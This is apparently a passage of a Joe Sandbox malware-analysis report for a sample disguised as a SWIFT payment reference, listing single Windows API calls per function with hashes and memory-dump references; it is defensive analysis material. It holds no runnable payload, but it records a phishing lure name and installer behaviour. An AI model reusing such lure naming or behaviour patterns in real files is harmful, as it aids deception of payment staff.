Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: d6c66003e552b008329da1e20e4d2717e0cd9ee39e84ac84dc665d8d2f310599
Instruction ID: 32516517407f25b6e59a0e341b25b3d6d0f9df0b9bc0d747a1158fd544962da6
Opcode Fuzzy Hash: d6c66003e552b008329da1e20e4d2717e0cd9ee39e84ac84dc665d8d2f310599
Instruction Fuzzy Hash: E3F09031A08120E6CB217BA69E4DE5E2154AF82378F24023FF012B21D1DABD891295AE

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 0073700d60adfbe4143881f22dadb7b811daca8f4e16451e7651026b97bb0fbf
Instruction ID: 54a96972ebf6e5f7d9af5d5faa48068549acc1a9791dfdba756491a3e909a95f
Opcode Fuzzy Hash: 0073700d60adfbe4143881f22dadb7b811daca8f4e16451e7651026b97bb0fbf
Instruction Fuzzy Hash: 06E0D872204100EBE740DB64DD48EAA3368DF40318B204236E101A50D1E6B48901932D

Uniqueness

Uniqueness Score: -1.00%

Function 004063A2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: 33fcb2899acb2d8a51dea3519172d90e3aaf79576ce2bf617fe5633813c3fc69
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 40E0BF72010109BEDF195F50ED0AD7B3A1DE704300F01452EB906D4051E6B5A9306664

Uniqueness

Uniqueness Score: -1.00%

Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5

Uniqueness

Uniqueness Score: -1.00%

Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789

Uniqueness

Uniqueness Score: -1.00%

Function 00406374 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 49f9fd1bc8bfa64a42858f6b518ea0692b6e5c78bd7a65508ddb9d9f32b2eb8f
Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
Opcode Fuzzy Hash: 49f9fd1bc8bfa64a42858f6b518ea0692b6e5c78bd7a65508ddb9d9f32b2eb8f
Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619

Uniqueness

Uniqueness Score: -1.00%

Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00405B2D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B3C

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

